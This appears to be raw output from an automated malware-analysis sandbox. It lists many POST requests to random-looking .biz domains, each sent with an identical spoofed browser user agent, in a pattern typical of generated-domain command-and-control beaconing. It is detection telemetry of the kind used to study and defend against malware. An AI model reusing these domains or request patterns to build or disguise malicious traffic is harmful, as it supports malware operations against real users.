                Source: global trafficHTTP traffic detected: POST /leqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ixcnnbyrmpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iuqfwfkapu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ymsikktgwjcaw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rvfsblrqhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wiuuagnokpngbsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kfmcpedbjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rifmhdkgmasf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tbncyidxtibogxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /eakdwqhsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bcjrqnssupbqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /taks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qbllddvxueecww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jaypbwnkuad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cnub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /udqtfnpdyqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kacads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nuyubw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /enxhgeexxmda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /pry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /sbnab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dvarulpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tfbvwglkixk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /noubyejh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cdrlubbsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qmfujjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dxlhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rgkgvuyxljjatio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vhecjxbkixjuljyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cgkctkdxtvumt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nmqrslobvguxfrkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /esgffqvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /eviqjrwjsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xyrpanl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /aoayitmlcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ceercoregt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xgyulldvremqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jhppqdqsxkpre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fumyjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hubil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bulntsganndw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ckivxpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ltyaxjqvibv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dgltjhlriyylmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /leqoagwnoid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /aiql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yqqmngrjnxvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /exygmnocmwksy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vbohqiwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yjcuxjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rwfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /levm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /opxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /aldycdkjcqrlqwgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
